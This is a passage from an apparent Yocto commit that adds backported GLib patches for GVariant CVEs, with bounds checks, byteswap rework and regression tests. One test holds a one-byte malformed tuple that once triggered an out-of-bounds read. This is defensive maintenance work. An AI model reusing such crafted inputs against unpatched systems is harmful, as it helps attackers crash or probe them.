3Date: Wed, 9 Aug 2023 10:39:34 +0000
4Subject: [PATCH] gvariant-serialiser: Factor out functions for dealing with
5 framing offsets
6
7This introduces no functional changes.
8
9Helps: #2121
10
11CVE: CVE-2023-32665
12Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/446e69f5edd72deb2196dee36bbaf8056caf6948]
13Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
14---
15 glib/gvariant.c | 81 +++++++++++++++++++++++++++++++++----------
16 glib/tests/gvariant.c | 57 ++++++++++++++++++++++++++----
17 2 files changed, 112 insertions(+), 26 deletions(-)
18
19diff --git a/glib/gvariant.c b/glib/gvariant.c
20index 4dbd9e8..a80c2c9 100644
21--- a/glib/gvariant.c
22+++ b/glib/gvariant.c
23@@ -5788,7 +5788,8 @@ g_variant_iter_loop (GVariantIter *iter,
24
25 /* Serialised data {{{1 */
26 static GVariant *
27-g_variant_deep_copy (GVariant *value)
28+g_variant_deep_copy (GVariant *value,
29+ gboolean byteswap)
30 {
31 switch (g_variant_classify (value))
32 {
33@@ -5806,7 +5807,7 @@ g_variant_deep_copy (GVariant *value)
34 for (i = 0, n_children = g_variant_n_children (value); i < n_children; i++)
35 {
36 GVariant *child = g_variant_get_child_value (value, i);
37- g_variant_builder_add_value (&builder, g_variant_deep_copy (child));
38+ g_variant_builder_add_value (&builder, g_variant_deep_copy (child, byteswap));
39 g_variant_unref (child);
40 }
41
42@@ -5820,28 +5821,63 @@ g_variant_deep_copy (GVariant *value)
43 return g_variant_new_byte (g_variant_get_byte (value));
44
45 case G_VARIANT_CLASS_INT16:
46- return g_variant_new_int16 (g_variant_get_int16 (value));
47+ if (byteswap)
48+ return g_variant_new_int16 (GUINT16_SWAP_LE_BE (g_variant_get_int16 (value)));
49+ else
50+ return g_variant_new_int16 (g_variant_get_int16 (value));
51
52 case G_VARIANT_CLASS_UINT16:
53- return g_variant_new_uint16 (g_variant_get_uint16 (value));
54+ if (byteswap)
55+ return g_variant_new_uint16 (GUINT16_SWAP_LE_BE (g_variant_get_uint16 (value)));
56+ else
57+ return g_variant_new_uint16 (g_variant_get_uint16 (value));
58
59 case G_VARIANT_CLASS_INT32:
60- return g_variant_new_int32 (g_variant_get_int32 (value));
61+ if (byteswap)
62+ return g_variant_new_int32 (GUINT32_SWAP_LE_BE (g_variant_get_int32 (value)));
63+ else
64+ return g_variant_new_int32 (g_variant_get_int32 (value));
65
66 case G_VARIANT_CLASS_UINT32:
67- return g_variant_new_uint32 (g_variant_get_uint32 (value));
68+ if (byteswap)
69+ return g_variant_new_uint32 (GUINT32_SWAP_LE_BE (g_variant_get_uint32 (value)));
70+ else
71+ return g_variant_new_uint32 (g_variant_get_uint32 (value));
72
73 case G_VARIANT_CLASS_INT64:
74- return g_variant_new_int64 (g_variant_get_int64 (value));
75+ if (byteswap)
76+ return g_variant_new_int64 (GUINT64_SWAP_LE_BE (g_variant_get_int64 (value)));
77+ else
78+ return g_variant_new_int64 (g_variant_get_int64 (value));
79
80 case G_VARIANT_CLASS_UINT64:
81- return g_variant_new_uint64 (g_variant_get_uint64 (value));
82+ if (byteswap)
83+ return g_variant_new_uint64 (GUINT64_SWAP_LE_BE (g_variant_get_uint64 (value)));
84+ else
85+ return g_variant_new_uint64 (g_variant_get_uint64 (value));
86
87 case G_VARIANT_CLASS_HANDLE:
88- return g_variant_new_handle (g_variant_get_handle (value));
89+ if (byteswap)
90+ return g_variant_new_handle (GUINT32_SWAP_LE_BE (g_variant_get_handle (value)));
91+ else
92+ return g_variant_new_handle (g_variant_get_handle (value));
93
94 case G_VARIANT_CLASS_DOUBLE:
95- return g_variant_new_double (g_variant_get_double (value));
96+ if (byteswap)
97+ {
98+ /* We have to convert the double to a uint64 here using a union,
99+ * because a cast will round it numerically. */
100+ union
101+ {
102+ guint64 u64;
103+ gdouble dbl;
104+ } u1, u2;
105+ u1.dbl = g_variant_get_double (value);
106+ u2.u64 = GUINT64_SWAP_LE_BE (u1.u64);
107+ return g_variant_new_double (u2.dbl);
108+ }
109+ else
110+ return g_variant_new_double (g_variant_get_double (value));
111
112 case G_VARIANT_CLASS_STRING:
113 return g_variant_new_string (g_variant_get_string (value, NULL));
114@@ -5896,7 +5932,7 @@ g_variant_get_normal_form (GVariant *value)
115 if (g_variant_is_normal_form (value))
116 return g_variant_ref (value);
117
118- trusted = g_variant_deep_copy (value);
119+ trusted = g_variant_deep_copy (value, FALSE);
120 g_assert (g_variant_is_trusted (trusted));
121
122 return g_variant_ref_sink (trusted);
123@@ -5916,6 +5952,11 @@ g_variant_get_normal_form (GVariant *value)
124 * contain multi-byte numeric data. That include strings, booleans,
125 * bytes and containers containing only these things (recursively).
126 *
127+ * While this function can safely handle untrusted, non-normal data, it is
128+ * recommended to check whether the input is in normal form beforehand, using
129+ * g_variant_is_normal_form(), and to reject non-normal inputs if your
130+ * application can be strict about what inputs it rejects.
131+ *
132 * The returned value is always in normal form and is marked as trusted.
133 *
134 * Returns: (transfer full): the byteswapped form of @value
135@@ -5933,21 +5974,20 @@ g_variant_byteswap (GVariant *value)
136
137 g_variant_type_info_query (type_info, &alignment, NULL);
138
139- if (alignment)
140- /* (potentially) contains multi-byte numeric data */
141+ if (alignment && g_variant_is_normal_form (value))
142 {
143+ /* (potentially) contains multi-byte numeric data, but is also already in
144+ * normal form so we can use a faster byteswapping codepath on the
145+ * serialised data */
146 GVariantSerialised serialised = { 0, };
147- GVariant *trusted;
148 GBytes *bytes;
149
150- trusted = g_variant_get_normal_form (value);
151- serialised.type_info = g_variant_get_type_info (trusted);
152- serialised.size = g_variant_get_size (trusted);
153+ serialised.type_info = g_variant_get_type_info (value);
154+ serialised.size = g_variant_get_size (value);
155 serialised.data = g_malloc (serialised.size);
156 serialised.ordered_offsets_up_to = G_MAXSIZE; /* operating on the normal form */
157 serialised.checked_offsets_up_to = G_MAXSIZE;
158- g_variant_store (trusted, serialised.data);
159- g_variant_unref (trusted);
160+ g_variant_store (value, serialised.data);
161
162 g_variant_serialised_byteswap (serialised);
163
164@@ -5955,6 +5995,9 @@ g_variant_byteswap (GVariant *value)
165 new = g_variant_ref_sink (g_variant_new_from_bytes (g_variant_get_type (value), bytes, TRUE));
166 g_bytes_unref (bytes);
167 }
168+ else if (alignment)
169+ /* (potentially) contains multi-byte numeric data */
170+ new = g_variant_ref_sink (g_variant_deep_copy (value, TRUE));
171 else
172 /* contains no multi-byte data */
173 new = g_variant_get_normal_form (value);
174diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
175index 3dda08e..679dd40 100644
176--- a/glib/tests/gvariant.c
177+++ b/glib/tests/gvariant.c
178@@ -2284,24 +2284,67 @@ serialise_tree (TreeInstance *tree,
179 static void
180 test_byteswap (void)
181 {
182- GVariantSerialised one = { 0, }, two = { 0, };
183+ GVariantSerialised one = { 0, }, two = { 0, }, three = { 0, };
184 TreeInstance *tree;
185-
186+ GVariant *one_variant = NULL;
187+ GVariant *two_variant = NULL;
188+ GVariant *two_byteswapped = NULL;
189+ GVariant *three_variant = NULL;
190+ GVariant *three_byteswapped = NULL;
191+ guint8 *three_data_copy = NULL;
192+ gsize three_size_copy = 0;
193+
194+ /* Write a tree out twice, once normally and once byteswapped. */
195 tree = tree_instance_new (NULL, 3);
196 serialise_tree (tree, &one);
197
198+ one_variant = g_variant_new_from_data (G_VARIANT_TYPE (g_variant_type_info_get_type_string (one.type_info)),
199+ one.data, one.size, FALSE, NULL, NULL);
200+
201 i_am_writing_byteswapped = TRUE;
202 serialise_tree (tree, &two);
203+ serialise_tree (tree, &three);
204 i_am_writing_byteswapped = FALSE;
205
206- g_variant_serialised_byteswap (two);
207-
208- g_assert_cmpmem (one.data, one.size, two.data, two.size);
209- g_assert_cmpuint (one.depth, ==, two.depth);
210-
211+ /* Swap the first byteswapped one back using the function we want to test. */
212+ two_variant = g_variant_new_from_data (G_VARIANT_TYPE (g_variant_type_info_get_type_string (two.type_info)),
213+ two.data, two.size, FALSE, NULL, NULL);
214+ two_byteswapped = g_variant_byteswap (two_variant);
215+
216+ /* Make the second byteswapped one non-normal (hopefully), and then byteswap
217+ * it back using the function we want to test in its non-normal mode.
218+ * This might not work because it’s not necessarily possible to make an
219+ * arbitrary random variant non-normal. Adding a single zero byte to the end
220+ * often makes something non-normal but still readable. */
221+ three_size_copy = three.size + 1;
222+ three_data_copy = g_malloc (three_size_copy);
223+ memcpy (three_data_copy, three.data, three.size);
224+ three_data_copy[three.size] = '\0';
225+
226+ three_variant = g_variant_new_from_data (G_VARIANT_TYPE (g_variant_type_info_get_type_string (three.type_info)),
227+ three_data_copy, three_size_copy, FALSE, NULL, NULL);
228+ three_byteswapped = g_variant_byteswap (three_variant);
229+
230+ /* Check they’re the same. We can always compare @one_variant and
231+ * @two_byteswapped. We can only compare @two_byteswapped and
232+ * @three_byteswapped if @two_variant and @three_variant are equal: in that
233+ * case, the corruption to @three_variant was enough to make it non-normal but
234+ * not enough to change its value. */
235+ g_assert_cmpvariant (one_variant, two_byteswapped);
236+
237+ if (g_variant_equal (two_variant, three_variant))
238+ g_assert_cmpvariant (two_byteswapped, three_byteswapped);
239+
240+ g_variant_unref (three_byteswapped);
241+ g_variant_unref (three_variant);
242+ g_variant_unref (two_byteswapped);
243+ g_variant_unref (two_variant);
244+ g_variant_unref (one_variant);
245 tree_instance_free (tree);
246 g_free (one.data);
247 g_free (two.data);
248+ g_free (three.data);
249+ g_free (three_data_copy);
250 }
251
252 static void
253--
2542.24.4
255
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32636.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32636.patch
new file mode 100644
index 0000000000..533142b22a
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32636.patch
@@ -0,0 +1,49 @@
1From 21a204147b16539b3eda3143b32844c49e29f4d4 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Thu, 17 Aug 2023 11:33:49 +0000
4Subject: [PATCH] gvariant: Propagate trust when getting a child of a
5 serialised variant
6
7If a variant is trusted, that means all its children are trusted, so
8ensure that their checked offsets are set as such.
9
10This allows a lot of the offset table checks to be avoided when getting
11children from trusted serialised tuples, which speeds things up.
12
13No unit test is included because this is just a performance fix. If
14there are other slownesses, or regressions, in serialised `GVariant`
15performance, the fuzzing setup will catch them like it did this one.
16
17This change does reduce the time to run the oss-fuzz reproducer from 80s
18to about 0.7s on my machine.
19
20Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
21
22Fixes: #2841
23oss-fuzz#54314
24
25CVE: CVE-2023-32636
26Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/21a204147b16539b3eda3143b32844c49e29f4d4]
27Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
28---
29 glib/gvariant-core.c | 4 ++--
30 1 file changed, 2 insertions(+), 2 deletions(-)
31
32diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
33index 1b9d5cc..ed57c70 100644
34--- a/glib/gvariant-core.c
35+++ b/glib/gvariant-core.c
36@@ -1173,8 +1173,8 @@ g_variant_get_child_value (GVariant *value,
37 child->contents.serialised.bytes =
38 g_bytes_ref (value->contents.serialised.bytes);
39 child->contents.serialised.data = s_child.data;
40- child->contents.serialised.ordered_offsets_up_to = s_child.ordered_offsets_up_to;
41- child->contents.serialised.checked_offsets_up_to = s_child.checked_offsets_up_to;
42+ child->contents.serialised.ordered_offsets_up_to = (value->state & STATE_TRUSTED) ? G_MAXSIZE : s_child.ordered_offsets_up_to;
43+ child->contents.serialised.checked_offsets_up_to = (value->state & STATE_TRUSTED) ? G_MAXSIZE : s_child.checked_offsets_up_to;
44
45 return child;
46 }
47--
482.24.4
49
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32643.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32643.patch
new file mode 100644
index 0000000000..9c0867bf5f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32643.patch
@@ -0,0 +1,154 @@
1From 78da5faccb3e065116b75b3ff87ff55381da6c76 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Thu, 17 Aug 2023 11:24:43 +0000
4Subject: [PATCH] gvariant: Check offset table doesn't fall outside variant
5 bounds
6
7When dereferencing the first entry in the offset table for a tuple,
8check that it doesn’t fall outside the bounds of the variant first.
9
10This prevents an out-of-bounds read from some non-normal tuples.
11
12This bug was introduced in commit 73d0aa81c2575a5c9ae77d.
13
14Includes a unit test, although the test will likely only catch the
15original bug if run with asan enabled.
16
17Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
18
19Fixes: #2840
20oss-fuzz#54302
21
22CVE: CVE-2023-32643
23Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/78da5faccb3e065116b75b3ff87ff55381da6c76]
24Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
25---
26 glib/gvariant-serialiser.c | 12 ++++++--
27 glib/tests/gvariant.c | 63 ++++++++++++++++++++++++++++++++++++++
28 2 files changed, 72 insertions(+), 3 deletions(-)
29
30diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
31index 5aa2cbc..4e50ed7 100644
32--- a/glib/gvariant-serialiser.c
33+++ b/glib/gvariant-serialiser.c
34@@ -979,7 +979,8 @@ gvs_tuple_get_member_bounds (GVariantSerialised value,
35
36 member_info = g_variant_type_info_member_info (value.type_info, index_);
37
38- if (member_info->i + 1)
39+ if (member_info->i + 1 &&
40+ offset_size * (member_info->i + 1) <= value.size)
41 member_start = gvs_read_unaligned_le (value.data + value.size -
42 offset_size * (member_info->i + 1),
43 offset_size);
44@@ -990,7 +991,8 @@ gvs_tuple_get_member_bounds (GVariantSerialised value,
45 member_start &= member_info->b;
46 member_start |= member_info->c;
47
48- if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST)
49+ if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST &&
50+ offset_size * (member_info->i + 1) <= value.size)
51 member_end = value.size - offset_size * (member_info->i + 1);
52
53 else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
54@@ -1001,11 +1003,15 @@ gvs_tuple_get_member_bounds (GVariantSerialised value,
55 member_end = member_start + fixed_size;
56 }
57
58- else /* G_VARIANT_MEMBER_ENDING_OFFSET */
59+ else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_OFFSET &&
60+ offset_size * (member_info->i + 2) <= value.size)
61 member_end = gvs_read_unaligned_le (value.data + value.size -
62 offset_size * (member_info->i + 2),
63 offset_size);
64
65+ else /* invalid */
66+ member_end = G_MAXSIZE;
67+
68 if (out_member_start != NULL)
69 *out_member_start = member_start;
70 if (out_member_end != NULL)
71diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
72index 679dd40..2eca8be 100644
73--- a/glib/tests/gvariant.c
74+++ b/glib/tests/gvariant.c
75@@ -5432,6 +5432,67 @@ test_normal_checking_tuple_offsets4 (void)
76 g_variant_unref (variant);
77 }
78
79+/* This is a regression test that dereferencing the first element in the offset
80+ * table doesn’t dereference memory before the start of the GVariant. The first
81+ * element in the offset table gives the offset of the final member in the
82+ * tuple (the offset table is stored in reverse), and the position of this final
83+ * member is needed to check that none of the tuple members overlap with the
84+ * offset table
85+ *
86+ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2840 */
87+static void
88+test_normal_checking_tuple_offsets5 (void)
89+{
90+ /* A tuple of type (sss) in normal form would have an offset table with two
91+ * entries:
92+ * - The first entry (lowest index in the table) gives the offset of the
93+ * third `s` in the tuple, as the offset table is reversed compared to the
94+ * tuple members.
95+ * - The second entry (highest index in the table) gives the offset of the
96+ * second `s` in the tuple.
97+ * - The offset of the first `s` in the tuple is always 0.
98+ *
99+ * See §2.5.4 (Structures) of the GVariant specification for details, noting
100+ * that the table is only layed out this way because all three members of the
101+ * tuple have non-fixed sizes.
102+ *
103+ * It’s not clear whether the 0xaa data of this variant is part of the strings
104+ * in the tuple, or part of the offset table. It doesn’t really matter. This
105+ * is a regression test to check that the code to validate the offset table
106+ * doesn’t unconditionally try to access the first entry in the offset table
107+ * by subtracting the table size from the end of the GVariant data.
108+ *
109+ * In this non-normal case, that would result in an address off the start of
110+ * the GVariant data, and an out-of-bounds read, because the GVariant is one
111+ * byte long, but the offset table is calculated as two bytes long (with 1B
112+ * sized entries) from the tuple’s type.
113+ */
114+ const GVariantType *data_type = G_VARIANT_TYPE ("(sss)");
115+ const guint8 data[] = { 0xaa };
116+ gsize size = sizeof (data);
117+ GVariant *variant = NULL;
118+ GVariant *normal_variant = NULL;
119+ GVariant *expected = NULL;
120+
121+ g_test_bug ("https://gitlab.gnome.org/GNOME/glib/-/issues/2840");
122+
123+ variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
124+ g_assert_nonnull (variant);
125+
126+ g_assert_false (g_variant_is_normal_form (variant));
127+
128+ normal_variant = g_variant_get_normal_form (variant);
129+ g_assert_nonnull (normal_variant);
130+
131+ expected = g_variant_new_parsed ("('', '', '')");
132+ g_assert_cmpvariant (expected, variant);
133+ g_assert_cmpvariant (expected, normal_variant);
134+
135+ g_variant_unref (expected);
136+ g_variant_unref (normal_variant);
137+ g_variant_unref (variant);
138+}
139+
140 /* Test that an otherwise-valid serialised GVariant is considered non-normal if
141 * its offset table entries are too wide.
142 *
143@@ -5680,6 +5741,8 @@ main (int argc, char **argv)
144 test_normal_checking_tuple_offsets3);
145 g_test_add_func ("/gvariant/normal-checking/tuple-offsets4",
146 test_normal_checking_tuple_offsets4);
147+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets5",
148+ test_normal_checking_tuple_offsets5);
149 g_test_add_func ("/gvariant/normal-checking/tuple-offsets/minimal-sized",
150 test_normal_checking_tuple_offsets_minimal_sized);
151 g_test_add_func ("/gvariant/normal-checking/empty-object-path",
152--
1532.24.4
154
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0001.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0001.patch
new file mode 100644
index 0000000000..9fc58341cb
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0001.patch
@@ -0,0 +1,103 @@
1From 1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1 Mon Sep 17 00:00:00 2001
2From: William Manley <will@stb-tester.com>
3Date: Wed, 9 Aug 2023 10:04:49 +0000
4Subject: [PATCH] gvariant-core: Consolidate construction of
5 `GVariantSerialised`
6
7So I only need to change it in one place.
8
9This introduces no functional changes.
10
11Helps: #2121
12
13CVE: CVE-2023-32665
14Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1]
15Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
16---
17 glib/gvariant-core.c | 49 ++++++++++++++++++++++----------------------
18 1 file changed, 25 insertions(+), 24 deletions(-)
19
20diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
21index 9397573..aa0e0a0 100644
22--- a/glib/gvariant-core.c
23+++ b/glib/gvariant-core.c
24@@ -349,6 +349,27 @@ g_variant_ensure_size (GVariant *value)
25 }
26 }
27
28+/* < private >
29+ * g_variant_to_serialised:
30+ * @value: a #GVariant
31+ *
32+ * Gets a GVariantSerialised for a GVariant in state STATE_SERIALISED.
33+ */
34+inline static GVariantSerialised
35+g_variant_to_serialised (GVariant *value)
36+{
37+ g_assert (value->state & STATE_SERIALISED);
38+ {
39+ GVariantSerialised serialised = {
40+ value->type_info,
41+ (gpointer) value->contents.serialised.data,
42+ value->size,
43+ value->depth,
44+ };
45+ return serialised;
46+ }
47+}
48+
49 /* < private >
50 * g_variant_serialise:
51 * @value: a #GVariant
52@@ -991,16 +1012,8 @@ g_variant_n_children (GVariant *value)
53 g_variant_lock (value);
54
55 if (value->state & STATE_SERIALISED)
56- {
57- GVariantSerialised serialised = {
58- value->type_info,
59- (gpointer) value->contents.serialised.data,
60- value->size,
61- value->depth,
62- };
63-
64- n_children = g_variant_serialised_n_children (serialised);
65- }
66+ n_children = g_variant_serialised_n_children (
67+ g_variant_to_serialised (value));
68 else
69 n_children = value->contents.tree.n_children;
70
71@@ -1061,12 +1074,7 @@ g_variant_get_child_value (GVariant *value,
72 }
73
74 {
75- GVariantSerialised serialised = {
76- value->type_info,
77- (gpointer) value->contents.serialised.data,
78- value->size,
79- value->depth,
80- };
81+ GVariantSerialised serialised = g_variant_to_serialised (value);
82 GVariantSerialised s_child;
83 GVariant *child;
84
85@@ -1179,14 +1187,7 @@ g_variant_is_normal_form (GVariant *value)
86
87 if (value->state & STATE_SERIALISED)
88 {
89- GVariantSerialised serialised = {
90- value->type_info,
91- (gpointer) value->contents.serialised.data,
92- value->size,
93- value->depth
94- };
95-
96- if (g_variant_serialised_is_normal (serialised))
97+ if (g_variant_serialised_is_normal (g_variant_to_serialised (value)))
98 value->state |= STATE_TRUSTED;
99 }
100 else
101--
1022.24.4
103
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0002.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0002.patch
new file mode 100644
index 0000000000..0e96b8d457
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0002.patch
@@ -0,0 +1,210 @@
1From 446e69f5edd72deb2196dee36bbaf8056caf6948 Mon Sep 17 00:00:00 2001
2From: William Manley <will@stb-tester.com>
3Date: Wed, 9 Aug 2023 10:39:34 +0000
4Subject: [PATCH] gvariant-serialiser: Factor out functions for dealing with
5 framing offsets
6
7This introduces no functional changes.
8
9Helps: #2121
10
11CVE: CVE-2023-32665
12Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/446e69f5edd72deb2196dee36bbaf8056caf6948]
13Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
14---
15 glib/gvariant-serialiser.c | 108 +++++++++++++++++++------------------
16 1 file changed, 57 insertions(+), 51 deletions(-)
17
18diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
19index 83e9d85..c7c2114 100644
20--- a/glib/gvariant-serialiser.c
21+++ b/glib/gvariant-serialiser.c
22@@ -633,30 +633,62 @@ gvs_calculate_total_size (gsize body_size,
23 return body_size + 8 * offsets;
24 }
25
26+struct Offsets
27+{
28+ gsize data_size;
29+
30+ guchar *array;
31+ gsize length;
32+ guint offset_size;
33+
34+ gboolean is_normal;
35+};
36+
37 static gsize
38-gvs_variable_sized_array_n_children (GVariantSerialised value)
39+gvs_offsets_get_offset_n (struct Offsets *offsets,
40+ gsize n)
41+{
42+ return gvs_read_unaligned_le (
43+ offsets->array + (offsets->offset_size * n), offsets->offset_size);
44+}
45+
46+static struct Offsets
47+gvs_variable_sized_array_get_frame_offsets (GVariantSerialised value)
48 {
49+ struct Offsets out = { 0, };
50 gsize offsets_array_size;
51- gsize offset_size;
52 gsize last_end;
53
54 if (value.size == 0)
55- return 0;
56-
57- offset_size = gvs_get_offset_size (value.size);
58+ {
59+ out.is_normal = TRUE;
60+ return out;
61+ }
62
63- last_end = gvs_read_unaligned_le (value.data + value.size -
64- offset_size, offset_size);
65+ out.offset_size = gvs_get_offset_size (value.size);
66+ last_end = gvs_read_unaligned_le (value.data + value.size - out.offset_size,
67+ out.offset_size);
68
69 if (last_end > value.size)
70- return 0;
71+ return out; /* offsets not normal */
72
73 offsets_array_size = value.size - last_end;
74
75- if (offsets_array_size % offset_size)
76- return 0;
77+ if (offsets_array_size % out.offset_size)
78+ return out; /* offsets not normal */
79+
80+ out.data_size = last_end;
81+ out.array = value.data + last_end;
82+ out.length = offsets_array_size / out.offset_size;
83+ out.is_normal = TRUE;
84
85- return offsets_array_size / offset_size;
86+ return out;
87+}
88+
89+static gsize
90+gvs_variable_sized_array_n_children (GVariantSerialised value)
91+{
92+ return gvs_variable_sized_array_get_frame_offsets (value).length;
93 }
94
95 static GVariantSerialised
96@@ -664,8 +696,9 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
97 gsize index_)
98 {
99 GVariantSerialised child = { 0, };
100- gsize offset_size;
101- gsize last_end;
102+
103+ struct Offsets offsets = gvs_variable_sized_array_get_frame_offsets (value);
104+
105 gsize start;
106 gsize end;
107
108@@ -673,18 +706,11 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
109 g_variant_type_info_ref (child.type_info);
110 child.depth = value.depth + 1;
111
112- offset_size = gvs_get_offset_size (value.size);
113-
114- last_end = gvs_read_unaligned_le (value.data + value.size -
115- offset_size, offset_size);
116-
117 if (index_ > 0)
118 {
119 guint alignment;
120
121- start = gvs_read_unaligned_le (value.data + last_end +
122- (offset_size * (index_ - 1)),
123- offset_size);
124+ start = gvs_offsets_get_offset_n (&offsets, index_ - 1);
125
126 g_variant_type_info_query (child.type_info, &alignment, NULL);
127 start += (-start) & alignment;
128@@ -692,11 +718,9 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
129 else
130 start = 0;
131
132- end = gvs_read_unaligned_le (value.data + last_end +
133- (offset_size * index_),
134- offset_size);
135+ end = gvs_offsets_get_offset_n (&offsets, index_);
136
137- if (start < end && end <= value.size && end <= last_end)
138+ if (start < end && end <= value.size && end <= offsets.data_size)
139 {
140 child.data = value.data + start;
141 child.size = end - start;
142@@ -768,34 +792,16 @@ static gboolean
143 gvs_variable_sized_array_is_normal (GVariantSerialised value)
144 {
145 GVariantSerialised child = { 0, };
146- gsize offsets_array_size;
147- guchar *offsets_array;
148- guint offset_size;
149 guint alignment;
150- gsize last_end;
151- gsize length;
152 gsize offset;
153 gsize i;
154
155- if (value.size == 0)
156- return TRUE;
157-
158- offset_size = gvs_get_offset_size (value.size);
159- last_end = gvs_read_unaligned_le (value.data + value.size -
160- offset_size, offset_size);
161+ struct Offsets offsets = gvs_variable_sized_array_get_frame_offsets (value);
162
163- if (last_end > value.size)
164+ if (!offsets.is_normal)
165 return FALSE;
166
167- offsets_array_size = value.size - last_end;
168-
169- if (offsets_array_size % offset_size)
170- return FALSE;
171-
172- offsets_array = value.data + value.size - offsets_array_size;
173- length = offsets_array_size / offset_size;
174-
175- if (length == 0)
176+ if (value.size != 0 && offsets.length == 0)
177 return FALSE;
178
179 child.type_info = g_variant_type_info_element (value.type_info);
180@@ -803,14 +809,14 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
181 child.depth = value.depth + 1;
182 offset = 0;
183
184- for (i = 0; i < length; i++)
185+ for (i = 0; i < offsets.length; i++)
186 {
187 gsize this_end;
188
189- this_end = gvs_read_unaligned_le (offsets_array + offset_size * i,
190- offset_size);
191+ this_end = gvs_read_unaligned_le (offsets.array + offsets.offset_size * i,
192+ offsets.offset_size);
193
194- if (this_end < offset || this_end > last_end)
195+ if (this_end < offset || this_end > offsets.data_size)
196 return FALSE;
197
198 while (offset & alignment)
199@@ -832,7 +838,7 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
200 offset = this_end;
201 }
202
203- g_assert (offset == last_end);
204+ g_assert (offset == offsets.data_size);
205
206 return TRUE;
207 }
208--
2092.24.4
210
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch
new file mode 100644
index 0000000000..e361cc7aad
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch
@@ -0,0 +1,417 @@
1From ade71fb544391b2e33e1859645726bfee0d5eaaf Mon Sep 17 00:00:00 2001
2From: William Manley <will@stb-tester.com>
3Date: Wed, 16 Aug 2023 03:12:21 +0000
4Subject: [PATCH] gvariant: Don't allow child elements to overlap with each
5 other
6
7If different elements of a variable sized array can overlap with each
8other then we can cause a `GVariant` to normalise to a much larger type.
9
10This commit changes the behaviour of `GVariant` with non-normal form data. If
11an invalid frame offset is found all subsequent elements are given their
12default value.
13
14When retrieving an element at index `n` we scan the frame offsets up to index
15`n` and if they are not in order we return an element with the default value
16for that type. This guarantees that elements don't overlap with each
17other. We remember the offset we've scanned up to so we don't need to
18repeat this work on subsequent accesses. We skip these checks for trusted
19data.
20
21Unfortunately this makes random access of untrusted data O(n) — at least
22on first access. It doesn't affect the algorithmic complexity of accessing
23elements in order, such as when using the `GVariantIter` interface. Also:
24the cost of validation will be amortised as the `GVariant` instance is
25continued to be used.
26
27I've implemented this with 4 different functions, 1 for each element size,
28rather than looping calling `gvs_read_unaligned_le` in the hope that the
29compiler will find it easy to optimise and should produce fairly tight
30code.
31
32Fixes: #2121
33
34CVE: CVE-2023-32665
35Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/ade71fb544391b2e33e1859645726bfee0d5eaaf]
36Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
37---
38 glib/gvariant-core.c | 35 ++++++++++++++++
39 glib/gvariant-serialiser.c | 86 ++++++++++++++++++++++++++++++++++++--
40 glib/gvariant-serialiser.h | 8 ++++
41 glib/tests/gvariant.c | 45 ++++++++++++++++++++
42 4 files changed, 171 insertions(+), 3 deletions(-)
43
44diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
45index aa0e0a0..9b51e15 100644
46--- a/glib/gvariant-core.c
47+++ b/glib/gvariant-core.c
48@@ -65,6 +65,7 @@ struct _GVariant
49 {
50 GBytes *bytes;
51 gconstpointer data;
52+ gsize ordered_offsets_up_to;
53 } serialised;
54
55 struct
56@@ -162,6 +163,24 @@ struct _GVariant
57 * if .data pointed to the appropriate number of nul
58 * bytes.
59 *
